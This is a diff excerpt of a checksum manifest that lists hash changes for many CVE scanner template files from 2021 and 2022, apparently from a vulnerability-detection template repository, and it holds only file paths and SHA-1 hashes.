+http/cves/2021/CVE-2021-42565.yaml:349855ab852f856d965c2509f381cd6a280db83c +http/cves/2021/CVE-2021-42566.yaml:6b4fea8d01a39aa24b8cb907502508b290479015 +http/cves/2021/CVE-2021-42567.yaml:25d6d3129b9f7ef453f4d31fcbbf4693c3e0a3bb +http/cves/2021/CVE-2021-42627.yaml:8bd1ef37323ca6a621b8125ea74629cf347850a2 http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:b652a696751484e4fe62faa5f76b35173b2750d1 -http/cves/2021/CVE-2021-43062.yaml:3ad8c35e2a4d1d1eb6575e9bfa202614ff9bf45c -http/cves/2021/CVE-2021-43287.yaml:89df229aa87f93a0d9b8a0862fc87506c394d086 -http/cves/2021/CVE-2021-43421.yaml:9e9538c9f9a44082df040bc55a071f244bf1c0bc +http/cves/2021/CVE-2021-42887.yaml:513914035f14721f9a08c8ea5568398dcdf067ae +http/cves/2021/CVE-2021-43062.yaml:c71fbab832d06d5b33828ae676e47b8747c15bff +http/cves/2021/CVE-2021-43287.yaml:16248fc2271234a81fa08e34dc91e1eea2399bf6 +http/cves/2021/CVE-2021-43421.yaml:75cab9aa0d3a6b660677a75116558d3b7c555ff1 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 -http/cves/2021/CVE-2021-43496.yaml:e5290c4bf73b51d8d7a9b72b786da52c792efacc -http/cves/2021/CVE-2021-43510.yaml:5bbb323d593178e5a7fad0f15f9ce444cc54660a -http/cves/2021/CVE-2021-43574.yaml:58127d69ee6b55562a1adb0d6c8727a953f75d84 -http/cves/2021/CVE-2021-43725.yaml:41ce9d637952eb2ca404f208919ceb9cfe13dc6d -http/cves/2021/CVE-2021-43734.yaml:dba526b082cfc049008079854f5c358cdc54dc74 -http/cves/2021/CVE-2021-43778.yaml:ad88d645783c6b9746154a4117a8ca7959b9ca96 -http/cves/2021/CVE-2021-43798.yaml:de04e3df23ebd2c069be1b336f0012aac224cd20 -http/cves/2021/CVE-2021-43810.yaml:526535289d787090ef90d066f958104848576da4 -http/cves/2021/CVE-2021-44077.yaml:1644a3a64ebce7407238683eb03183ff9c26bd36 -http/cves/2021/CVE-2021-44138.yaml:3c5c76e5460123baafa27dd63bb85b79548a6df3 -http/cves/2021/CVE-2021-44139.yaml:fa88a23765b635e301c27d0c9156c82885acd14c -http/cves/2021/CVE-2021-44152.yaml:8b5d9cf98c57998620f4fa6442de1afa32329253 -http/cves/2021/CVE-2021-44228.yaml:f545ebcc0e97655ca69d29d9f4621a84bf8f1c11 -http/cves/2021/CVE-2021-44427.yaml:6b68d18623ee449f8123ae7d1814abea2ebba95c -http/cves/2021/CVE-2021-44451.yaml:d426662cca643eebe07c7c3ffa4ee527ae38c573 -http/cves/2021/CVE-2021-44515.yaml:2377df3a403f2b0e4348f80c3d8a0657dcfe6767 -http/cves/2021/CVE-2021-44528.yaml:dd96edc7d677dbffbb885fa6e72343c6d483e914 -http/cves/2021/CVE-2021-44529.yaml:cf9873ecc8d0687caf0d1ec7437ad2a149444a92 -http/cves/2021/CVE-2021-44848.yaml:72866e10d920ae7ab6caef5d0b943cb17ab72665 +http/cves/2021/CVE-2021-43496.yaml:550ea33b0e0144d91382b8351c5ff8331b6e3bdf +http/cves/2021/CVE-2021-43510.yaml:e90f6fcbc02221af5c21502f37214e7dbb03da06 +http/cves/2021/CVE-2021-43574.yaml:fa3aed7dc20e9eb8a8e6b4c67c713fdc06db754e +http/cves/2021/CVE-2021-43725.yaml:59285460dc20d495fc8de3f504303e4092f9abeb +http/cves/2021/CVE-2021-43734.yaml:dea1b7bf4546e4c474fd3a61042b80a6ab67755e +http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 +http/cves/2021/CVE-2021-43798.yaml:7f0c4ac0ca895a44b62aac3b17d5af98831a7b35 +http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f +http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d +http/cves/2021/CVE-2021-44138.yaml:bcd6d09acb5531955814c792a08a48d3f300b6df +http/cves/2021/CVE-2021-44139.yaml:e2abf3fb9150c49b3e62712c0f5ccaaae8267c02 +http/cves/2021/CVE-2021-44152.yaml:97d21f7c6479a629ce57d98f7aed969c6a41337b +http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f +http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 +http/cves/2021/CVE-2021-44451.yaml:84311023e257489100f240c95bbe75a967e0dd3d +http/cves/2021/CVE-2021-44515.yaml:da4641ba423dd57a8ee2a74df23f13ff1c78d764 +http/cves/2021/CVE-2021-44528.yaml:a90fe083b4bfef66425ecb9f129dccb029da470f +http/cves/2021/CVE-2021-44529.yaml:9bc01beb998db429f7f503dcb18c4e48852c108f +http/cves/2021/CVE-2021-44848.yaml:bd86dec475898fda93191256ca601bc9f17d2dd6 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:4db365b28f347995f9a00d0cf3a86607d90450b7 -http/cves/2021/CVE-2021-45046.yaml:0b49378253d16c99f2ee11fbae7118a9bc97b1a0 -http/cves/2021/CVE-2021-45092.yaml:1dba004d7ee00fa91c11183e02de07b361e0bf4f -http/cves/2021/CVE-2021-45232.yaml:d2c1bafb15044e35687dd8b61324bbcaa9663c97 -http/cves/2021/CVE-2021-45380.yaml:28a8998161318fb791ec581cb4c6a3c5245833d4 +http/cves/2021/CVE-2021-45043.yaml:1e51c0d78e6fc4258b3507a9c28853b3c9a60aa8 +http/cves/2021/CVE-2021-45046.yaml:afbe6d9a4df0b57c8853d9fce778442240163d57 +http/cves/2021/CVE-2021-45092.yaml:961fde42602a37607b86120d8a299db382e42444 +http/cves/2021/CVE-2021-45232.yaml:c09fc24183a14f9ad3bc2e917a0c58cd2bedb705 +http/cves/2021/CVE-2021-45380.yaml:5d7282f11e5e5a66f1a5969b7d82928d74009d37 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:5f575fea8f02589ffefda0f7bbb15ed05cb6e06a -http/cves/2021/CVE-2021-45428.yaml:7a5a27ecbf32f0b4d97e631a5b7dff3c5273918e +http/cves/2021/CVE-2021-45422.yaml:abe8cd4316f90eb4455c2de2069f1237fdb60b2d +http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 -http/cves/2021/CVE-2021-45968.yaml:d6e44da357371f41e4af563fb03bccd9de105665 -http/cves/2021/CVE-2021-46005.yaml:37a4af6e976d9154a3acd2b3114fc430ffe28688 +http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 +http/cves/2021/CVE-2021-46005.yaml:3b3b7ae4a988dd406432da64978b8a385a76f20d http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 -http/cves/2021/CVE-2021-46069.yaml:263123f9863d0fff4b12647b2af0d70f61e1da93 -http/cves/2021/CVE-2021-46071.yaml:be69e1de19a625ea890c5adc664197ed219e5c5c -http/cves/2021/CVE-2021-46072.yaml:c94fbbed0b6f71806b45297c2ad54aaeac656efe +http/cves/2021/CVE-2021-46069.yaml:7783bc454b975263aac0f62dbfdb460f0c3c42c0 +http/cves/2021/CVE-2021-46071.yaml:a76d33573617d153689d9213a457a03115c736e4 +http/cves/2021/CVE-2021-46072.yaml:ea0e7e2699eff6c50de4bd5ca80d862ba3ceb89e http/cves/2021/CVE-2021-46073.yaml:370eac8c9753d59b40b3ace444f6ac9875a63e30 -http/cves/2021/CVE-2021-46107.yaml:b9bad6acbf7575d9c393b2564265e1a5691f1c46 +http/cves/2021/CVE-2021-46107.yaml:641c648031b4996c9675c33b60f84a027ef396ad http/cves/2021/CVE-2021-46379.yaml:8d6452a442fe0d4a02cdb518cb4b8c8b1a74ef0f -http/cves/2021/CVE-2021-46381.yaml:75b38da693dfd3d74f643fe7a39ee9dfcdfbab34 -http/cves/2021/CVE-2021-46387.yaml:820741fa5c155a62a65ae03741bade8e1b8316cb -http/cves/2021/CVE-2021-46417.yaml:184828b0c60562bd2dfa267fb1cb42935258ef31 -http/cves/2021/CVE-2021-46418.yaml:0f395c12b1e0e2faa82edd9aea14d17d6771f97a -http/cves/2021/CVE-2021-46419.yaml:e2a58404236416ee7faf026547c70a201b604f58 -http/cves/2021/CVE-2021-46422.yaml:41d3ddae9c0fd140ccaccf65b05c44de8071d9ff -http/cves/2021/CVE-2021-46424.yaml:0a01448b7eebb11fa41787e31ff4df5ae1b80cfc -http/cves/2021/CVE-2021-46704.yaml:75ccf63cb86b0455de6ed2f3a18f9461036f737d -http/cves/2022/CVE-2022-0087.yaml:96d30fc9b4ecbcc340068ec0a2e0893ff40f1752 +http/cves/2021/CVE-2021-46381.yaml:bbcbebb42a2e8f7f01be371dc8232f53ffead9c8 +http/cves/2021/CVE-2021-46387.yaml:fbaa07306156853f0ad9c456e5fcdbf513325525 +http/cves/2021/CVE-2021-46417.yaml:81fc12ccebc22b72ca3d728fa7d161e9505ec4b6 +http/cves/2021/CVE-2021-46418.yaml:e509a70568c23a42f981b047a31ea92feb06ab25 +http/cves/2021/CVE-2021-46419.yaml:ae2aac1ea6d97d7931ce84530d527552810b1da4 +http/cves/2021/CVE-2021-46422.yaml:0579fb33431d31ec41b9974a2d5b1dd65e6c2168 +http/cves/2021/CVE-2021-46424.yaml:9617db0426268d98d18332d222675f954fd2dc91 +http/cves/2021/CVE-2021-46704.yaml:1151ef46dae07f75345210c43a707142147a474e +http/cves/2022/CVE-2022-0087.yaml:ab30fa1e96d3eefebcff47dc05be32b1ef1d6467 http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 -http/cves/2022/CVE-2022-0147.yaml:58d1f7087d04a19479c6059d2a351e89067e57cf -http/cves/2022/CVE-2022-0148.yaml:c519410ada58a1024c581fbb8390ee16fce23b5c -http/cves/2022/CVE-2022-0149.yaml:cdaa1e7fa3d3965d3a5a7e68d7ed2ee002783309 -http/cves/2022/CVE-2022-0150.yaml:92f4eda8d824338d40eff023455effea0deed7c6 +http/cves/2022/CVE-2022-0147.yaml:d50f59648ef62408d211f30339418e1f73546638 +http/cves/2022/CVE-2022-0148.yaml:6a2d16cdaa86368c72f3cebd570cf17b9b62884b +http/cves/2022/CVE-2022-0149.yaml:af0215192be07e3b138588253c487d2d703af86f +http/cves/2022/CVE-2022-0150.yaml:f765c4284c3293fe8b624302e607fb8ff2bd6c29 http/cves/2022/CVE-2022-0165.yaml:e21ba3dfe35f2b3998366d54a92f873f4a043135 -http/cves/2022/CVE-2022-0169.yaml:ae25c860e5de463251aae8fe4403d4819809ab4f -http/cves/2022/CVE-2022-0189.yaml:378e59aea7a1b26e04c778902959a4bd92d7bfa3 +http/cves/2022/CVE-2022-0169.yaml:73319c090a403deb80d746331231a0f83221abed +http/cves/2022/CVE-2022-0189.yaml:6f59568727b063610e2c24e6433ea81631ce8656 http/cves/2022/CVE-2022-0201.yaml:04312080723927883df87137d0d5eb769d3c4045 -http/cves/2022/CVE-2022-0206.yaml:5f45d476b92fcb037c75b1f3a91136ac8e8007c2 +http/cves/2022/CVE-2022-0206.yaml:e41f2247cca58a20bf9db2562b63d82a1a88fe76 http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 -http/cves/2022/CVE-2022-0212.yaml:569f37fa82968453259475bb02344ce05c1f1238 +http/cves/2022/CVE-2022-0212.yaml:cd4f5f85b3a6879d1848a351c1eb1a23468aaa72 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 http/cves/2022/CVE-2022-0220.yaml:b3d359e13bca582b964565a09419347cfde13608 -http/cves/2022/CVE-2022-0228.yaml:6b2faa22a3cc9535bbc2118316d8c0a5c85d691d -http/cves/2022/CVE-2022-0234.yaml:1bf0c595f2a6fde1563f84feb27890832a698099 -http/cves/2022/CVE-2022-0271.yaml:982ff0fc90e3568327d23b1b61e5474792599782 -http/cves/2022/CVE-2022-0281.yaml:f7e979cfdee4932734b6f202712c5bf02067a72a -http/cves/2022/CVE-2022-0288.yaml:f1cf4803487648721e9ed10c23c2de84dd60e245 -http/cves/2022/CVE-2022-0342.yaml:a0b57e0b25d6bd42a09f0e97e76fd6067b2e9f2d +http/cves/2022/CVE-2022-0228.yaml:cf59f3e5671faadd5f722f3992062483fa52789c +http/cves/2022/CVE-2022-0234.yaml:28adef5f0da5150793b2b58515a733b094122c01 +http/cves/2022/CVE-2022-0271.yaml:12559da2dbf1bd54ee65b330bc05320a598317c7 +http/cves/2022/CVE-2022-0281.yaml:d39333e81404820d979f757cff2ff5e92e014ead +http/cves/2022/CVE-2022-0288.yaml:bded7808021892901eeb0ca82eaa4d323e5d8e9d +http/cves/2022/CVE-2022-0342.yaml:7ad6be74eecbdae6633555867578a66ea7676bd7 http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 -http/cves/2022/CVE-2022-0349.yaml:fdde6d3801452f54280f76f5b7218e6af3874c20 -http/cves/2022/CVE-2022-0378.yaml:f9b45d78cc2fa38664b2888e1a6668e0f8db071e +http/cves/2022/CVE-2022-0349.yaml:800ce9d18fc4a8c58d309ca4e50610a2c1143114 +http/cves/2022/CVE-2022-0378.yaml:b0a63a5b4d4bbea5e86edccbdbca5d5380dcc493 http/cves/2022/CVE-2022-0381.yaml:bab0c1f47359cc9c8960f33d7266351eb1565086 http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 -http/cves/2022/CVE-2022-0415.yaml:43badfdc1cb603cabd639e037e7ca72baa540347 -http/cves/2022/CVE-2022-0422.yaml:8955d66723dc59c09675534435b4c93aa2cef1fa -http/cves/2022/CVE-2022-0424.yaml:f09a2112a5421d11aac45e34938d600b74c71333 -http/cves/2022/CVE-2022-0432.yaml:b492288e1d57520617110aa8577bcf2bf832c785 -http/cves/2022/CVE-2022-0434.yaml:e695ba2491bce90444a1058b27bef6690c4865b3 +http/cves/2022/CVE-2022-0415.yaml:58fb646d9818d5cd5d799b6259cd25ebad7e201c +http/cves/2022/CVE-2022-0422.yaml:6269517eaa64f536ddf2367ac408b436a6fed3a4 +http/cves/2022/CVE-2022-0424.yaml:a15f808f9bf89cda5d300f87d1968bb94076b0f4 +http/cves/2022/CVE-2022-0432.yaml:1b318f354339465c6a6dd7e42c5d12a45c3e160c +http/cves/2022/CVE-2022-0434.yaml:998f7112926cb758d14a8357ac45c0eb08744640 http/cves/2022/CVE-2022-0437.yaml:6a57d2ad863ac623a9a0ce5108e7620bd56e11fa http/cves/2022/CVE-2022-0441.yaml:c0d4b5a324d0e9415535f698f4ee3278d8225377 http/cves/2022/CVE-2022-0482.yaml:06f529926dbce7d867c0aa57cea96bc261ae7feb -http/cves/2022/CVE-2022-0533.yaml:8efd15c2a82f958f59acde765060ab45e5170dee +http/cves/2022/CVE-2022-0533.yaml:8ccd3d1054d1ae94cf7b67935f0eafc3535d18f3 http/cves/2022/CVE-2022-0535.yaml:12c5101dc64287aa7ed4e6e95b4c82b2e507ace5 http/cves/2022/CVE-2022-0540.yaml:a3a2456f497dd9162f512c1cefdc2ae77cb2bfb5 http/cves/2022/CVE-2022-0591.yaml:fd13351808c85fd8f0b666270fe6d7afaadab094 http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 -http/cves/2022/CVE-2022-0597.yaml:d1d3926087f435937d89a594bed0ecd848c8f87c -http/cves/2022/CVE-2022-0599.yaml:5047f9351c72fd3ee1ea33792568fcafffeaa5b6 -http/cves/2022/CVE-2022-0651.yaml:66883e63762a7cfc40b7b1bbe8513e396c0b0808 -http/cves/2022/CVE-2022-0653.yaml:47ee405bc84ddace974e1fda1f02051c1dddf3c2 -http/cves/2022/CVE-2022-0656.yaml:aa79d191591143c2dac13f1550f5823bc4f8cbec -http/cves/2022/CVE-2022-0658.yaml:e9d2506aa81aedd4fcfdb9d9cb911de0aa78d291 -http/cves/2022/CVE-2022-0660.yaml:76399d19000084ed00adedb6c8470124bb24b13f -http/cves/2022/CVE-2022-0678.yaml:b700d1edcc4b2055ff74f19cc3c59fba1e37df8b +http/cves/2022/CVE-2022-0597.yaml:385328795fc8323bc1e1f605236d5e0b18dc3d8f +http/cves/2022/CVE-2022-0599.yaml:396f247c7262420516ea089cfc09a748dbc1803b +http/cves/2022/CVE-2022-0651.yaml:b495b93f495fe5bd1e706ce24e66beab7233e2eb +http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 +http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf +http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 +http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 +http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b -http/cves/2022/CVE-2022-0692.yaml:b1a4dfacd3f66b6caa45ced45b15aaa91c917c79 -http/cves/2022/CVE-2022-0693.yaml:dd7ae739fa250c7ac4a291b5d0c671aeec0c2f58 -http/cves/2022/CVE-2022-0735.yaml:ef04222d839a546ee3cc85be31cf26430e5a9f68 -http/cves/2022/CVE-2022-0747.yaml:c52251229e43870a5ea620229c77c5d597ac5f29 +http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 +http/cves/2022/CVE-2022-0693.yaml:2aecdcd6ffe92ccba0d03350a27308e1da93c8cd +http/cves/2022/CVE-2022-0735.yaml:3f2a7802741090808fce2ba6f6a10607c2b5015b +http/cves/2022/CVE-2022-0747.yaml:890b432df0ad9e435385331f6c2eb688bb5a005e http/cves/2022/CVE-2022-0760.yaml:6cb4a03a430f9731eb6888abbb95be407f48dd01 -http/cves/2022/CVE-2022-0769.yaml:9ac274bdbd78d38e2ca5aef5fa435045802b6e85 +http/cves/2022/CVE-2022-0769.yaml:fa9f8927a0ec479b990f84398ae6d6682c8765ab http/cves/2022/CVE-2022-0773.yaml:60911205f06d37439f55025d19e56f3cdef9f67c -http/cves/2022/CVE-2022-0776.yaml:6cbcf9b4ed542cb22fb375f7ce0876df4ae639e0 -http/cves/2022/CVE-2022-0781.yaml:0806f48764264766afccada2acc2f98827602354 +http/cves/2022/CVE-2022-0776.yaml:7bd96bf74cec15da9b768dfd9e67a731a594c545 +http/cves/2022/CVE-2022-0781.yaml:c75712f70574a0f093bc6832e5fc779121ac49cf http/cves/2022/CVE-2022-0784.yaml:339ca31d50774616a5f566cb81ab5bd55e46a59b http/cves/2022/CVE-2022-0785.yaml:47eddef2296126f08953940173a7cd6c3611a807 -http/cves/2022/CVE-2022-0786.yaml:e363dfd0c1b24a0e57068636616d93beab88103d -http/cves/2022/CVE-2022-0787.yaml:e54f4d8c3fece95a12ded4232445e3aeb6f8475b +http/cves/2022/CVE-2022-0786.yaml:d3061ccf83938bb17391061d42e6ad26e1054133 +http/cves/2022/CVE-2022-0787.yaml:770ac3ab82af6c50987b53eea627cfde6ee48366 http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 -http/cves/2022/CVE-2022-0814.yaml:34df968bf978c79cd8819e2a503f14a0f9dd272b -http/cves/2022/CVE-2022-0817.yaml:5c431e59ea20592d78af76411e6d3da46e6c757e -http/cves/2022/CVE-2022-0824.yaml:7efd9a9ae0b141acd98b15701ee248154df116c4 -http/cves/2022/CVE-2022-0826.yaml:299c0297ba9281c8b60894c9f1035988adea8661 -http/cves/2022/CVE-2022-0827.yaml:7f902409a5b30eec1b049634f2421620e368aee4 -http/cves/2022/CVE-2022-0846.yaml:9601c3fa97da17932accbde0ba1d9638fd548393 -http/cves/2022/CVE-2022-0864.yaml:2518bb9d221e4206b6027e6fe3fbc28c0c95039c +http/cves/2022/CVE-2022-0814.yaml:e473e5d2a9b612a2412867eed364d71782c262a6 +http/cves/2022/CVE-2022-0817.yaml:3d97d0fc13055df8d7452acbf7103cbed7eb24cc +http/cves/2022/CVE-2022-0824.yaml:0c81c3a3ec7279bb619a1e0ddc46dd2fe2463ad7 +http/cves/2022/CVE-2022-0826.yaml:89bc081100825cb559a3d8e4864166d9be637ffb +http/cves/2022/CVE-2022-0827.yaml:0004c15fb0ac347037597f5d71d7800cf097e84a +http/cves/2022/CVE-2022-0846.yaml:19baadca475a5807aaafef134a6e7399ab75ec51 +http/cves/2022/CVE-2022-0864.yaml:f2dfdb584ab501f690ba9ef1aee6ecc88f0ae7f7 http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce -http/cves/2022/CVE-2022-0869.yaml:5f22f9c210878f98fe7d51b3f4d31220448a2b53 -http/cves/2022/CVE-2022-0870.yaml:3370c35e350ac61b23fcbb68a8ab0ae49560ecd6 +http/cves/2022/CVE-2022-0869.yaml:ffdda923697da8dad00a7821ca970cb742cc05db +http/cves/2022/CVE-2022-0870.yaml:c0a1da968d7de2ac01c434c3205bd76a4e818c7d http/cves/2022/CVE-2022-0885.yaml:841e640a6d3e053d8347a3f6083e082f8add157b -http/cves/2022/CVE-2022-0899.yaml:ede33b54f00c749d949e67929e400c4dc6938863 -http/cves/2022/CVE-2022-0928.yaml:d80673476c59832b3f7e3787d291ad7efef2ca46 +http/cves/2022/CVE-2022-0899.yaml:c733b3141b9bef1f5c43da49ef612ab4659ecb5b +http/cves/2022/CVE-2022-0928.yaml:cdf847204591956605abac79d420f1d5b75cd373 http/cves/2022/CVE-2022-0948.yaml:d81bdba80c595c26ed421d5ac4697749a26423d5 -http/cves/2022/CVE-2022-0949.yaml:dccd7a5fbf9b6f32b37b7108aa597e028f54b4be +http/cves/2022/CVE-2022-0949.yaml:cecc462fb3fa010b12cac54c2901675f7105f609 http/cves/2022/CVE-2022-0952.yaml:7e2d47b7c6fed59342471c942cb0707a354d59ed -http/cves/2022/CVE-2022-0954.yaml:85c28e58af00cf2eca329c7151f1ea4426ab711b -http/cves/2022/CVE-2022-0963.yaml:e9b05e33b4b2b10a429c4c0d819bf02bcb9a9b90 -http/cves/2022/CVE-2022-0968.yaml:162d0893c4eeeec34a60489625f19632ed43cb7e -http/cves/2022/CVE-2022-1007.yaml:3fd1301dc8f88363820d4a11e1f127d00118c611 -http/cves/2022/CVE-2022-1013.yaml:0b812916478c24470e327ecc540ccf224458d4fb +http/cves/2022/CVE-2022-0954.yaml:5f4736f21c8c640129ed812648c5bacbffd65ad6 +http/cves/2022/CVE-2022-0963.yaml:343a897b687d3a0251dd6ba042835f262613464b +http/cves/2022/CVE-2022-0968.yaml:7f41a4468f29df94ec356ce6d3696f6d3a53ffe0 +http/cves/2022/CVE-2022-1007.yaml:7fa894f5f894592900a2009b1c61500f729c9f9e +http/cves/2022/CVE-2022-1013.yaml:e28846ed928a45764a457f62019d3981ba035a9f http/cves/2022/CVE-2022-1020.yaml:59af3f4fbbadc5897088c95b708c639991dc15e6 -http/cves/2022/CVE-2022-1040.yaml:0338f322d06277a2483b734e7031b90987eca963 -http/cves/2022/CVE-2022-1054.yaml:328b9fc4c45be9ac1cdd955ea0acd35dc90cbd10 -http/cves/2022/CVE-2022-1057.yaml:e7848ebf7ab5cd6c7f4ac9a845a22036bcab95ff -http/cves/2022/CVE-2022-1058.yaml:470bd6029ed9652c473489eaef0d4cf53d4ca515 -http/cves/2022/CVE-2022-1119.yaml:34c32126dab5750c175f12ff4584910304e832a9 -http/cves/2022/CVE-2022-1162.yaml:13fbccfd9e0e667925edf8fa16f30d3db2e3a50c +http/cves/2022/CVE-2022-1040.yaml:ef0141940d3336b5a77a0819a4b6650d624eeb75 +http/cves/2022/CVE-2022-1054.yaml:c935bda6318e2aa45761fcbbb8a16799993f77b0 +http/cves/2022/CVE-2022-1057.yaml:d10ec405daf09748e2cee57619a8ce228f851d08 +http/cves/2022/CVE-2022-1058.yaml:fa6472726c416a474d04356f86e80eded60bef22 +http/cves/2022/CVE-2022-1119.yaml:afa8d79a86918b793e22a3a43b81a6cc9b3fc21b +http/cves/2022/CVE-2022-1162.yaml:aadb2ccbbe313d5db3cadfcf539a61bcdbbfecd2 http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f -http/cves/2022/CVE-2022-1170.yaml:4d896ab7996ee645f8f6d119dcc055dfa7998f6e -http/cves/2022/CVE-2022-1221.yaml:d7a6fa47284e7090b839907667c9296ba9e0b086 -http/cves/2022/CVE-2022-1329.yaml:b581942b2d9b46c5638853c3300a1d05fb9f7bdc -http/cves/2022/CVE-2022-1386.yaml:2f7a2b089ae2690a801e91ac4dd7b8710fa5e649 -http/cves/2022/CVE-2022-1388.yaml:c30f8e0fdcd48a2feee836e33401c76ea2d859c8 +http/cves/2022/CVE-2022-1170.yaml:23a3f124f13e2ed6c1b8528322b430457f7f62d5 +http/cves/2022/CVE-2022-1221.yaml:d4c46be1641ebeef015e219a3d6bfd4ab55ce8f0 +http/cves/2022/CVE-2022-1329.yaml:91ffe6a2f0b02dff11a43ae18576f2744a9d0fb1 +http/cves/2022/CVE-2022-1386.yaml:aa0a7b167a70177b8c278aae2abbda92dc3a65ff +http/cves/2022/CVE-2022-1388.yaml:e5f337ca85d659ab5b48e69dfa2e9a1c544b881b http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a -http/cves/2022/CVE-2022-1391.yaml:cce47bb47c7e144b8ee9ab3a94b77bcfbc551c5d -http/cves/2022/CVE-2022-1392.yaml:3e6660c3bacc2eb9f7f6b8025e0415ab25f5815b +http/cves/2022/CVE-2022-1391.yaml:d8fe08b47cb867425b80fa614e64f8b211ff609e +http/cves/2022/CVE-2022-1392.yaml:4a5322eb6a6ced5d4701bdba6ef76000f25ae688 http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed -http/cves/2022/CVE-2022-1439.yaml:66bc3d1bb1b6f206de5661adc27251d2e699c521 -http/cves/2022/CVE-2022-1442.yaml:5721248036a2fff83a52bed27124718e08d95d69 -http/cves/2022/CVE-2022-1574.yaml:0d5ac3e5ddcac8da6a4cfd8f8e018d7951fd31fd -http/cves/2022/CVE-2022-1580.yaml:f1574e38e79dadd9b5e08bfec6dd4a4a0783d66d +http/cves/2022/CVE-2022-1439.yaml:8116c3eb8cdc58d99590b47363373880a2b6fc4e +http/cves/2022/CVE-2022-1442.yaml:30e8e97a7bd381c969779fb4da9a6663d53cfe6a +http/cves/2022/CVE-2022-1574.yaml:142d329c712a44d57c8700e687f90ea359c0793f +http/cves/2022/CVE-2022-1580.yaml:e86f46e73eeefadee0fd5f5a1581fb6528a11981 http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d -http/cves/2022/CVE-2022-1597.yaml:90c6391409dddfaf4f3a7643d597e772deb4841b -http/cves/2022/CVE-2022-1598.yaml:0bf3a544454936cf7db585b6002c4eaa84fa72cc +http/cves/2022/CVE-2022-1597.yaml:acd2bc2b43d82b445540d1f4c22079064a682b0f +http/cves/2022/CVE-2022-1598.yaml:8128f57a4c1e94173bbcc9a79e43b3868d7a143e http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d -http/cves/2022/CVE-2022-1713.yaml:9828ac75de83bc7801f83da9ec2d29eb92e740bf +http/cves/2022/CVE-2022-1713.yaml:bca5d5a72566c083a6871e8473f90250a7abf66d http/cves/2022/CVE-2022-1724.yaml:51995547bb5168cd0645a5adf37a850a5a1e6b87 -http/cves/2022/CVE-2022-1756.yaml:b92f855ff00dc428a7c2a1605ce49eb0c71d76b1 -http/cves/2022/CVE-2022-1768.yaml:69b204d4963e3d0ebf9ec6196014834b9292034e -http/cves/2022/CVE-2022-1815.yaml:20befc0f7d15db67af95a179b70085b63ece11b9 +http/cves/2022/CVE-2022-1756.yaml:e66d32418b3801f7b9d1faa6f453b9085b44153e +http/cves/2022/CVE-2022-1768.yaml:b858d3fecec81416d5abb5cfea90245ddac0aed5 +http/cves/2022/CVE-2022-1815.yaml:d32b30a32ded3c4253324504d8175705eaa15a17 http/cves/2022/CVE-2022-1883.yaml:9ea27969a99bb6fcb353913f3c079f33f01a3e3c -http/cves/2022/CVE-2022-1903.yaml:811c45ec923ddd51a1c5c1405ad8c120ae19de74 +http/cves/2022/CVE-2022-1903.yaml:2a124e2da9fa4d26fbba2f834a5ffae2d3ae02a4 http/cves/2022/CVE-2022-1904.yaml:8364554cac977f888ab267875d02bbf1f2cb924b http/cves/2022/CVE-2022-1906.yaml:32a30dcf31d119545c4e7d34db4609089bf3fab5 http/cves/2022/CVE-2022-1910.yaml:285281f4e315d751f66c43077868a0c660fa544c http/cves/2022/CVE-2022-1916.yaml:c49dfcef4c446dc595f69fc553a3ac2a70461b5c 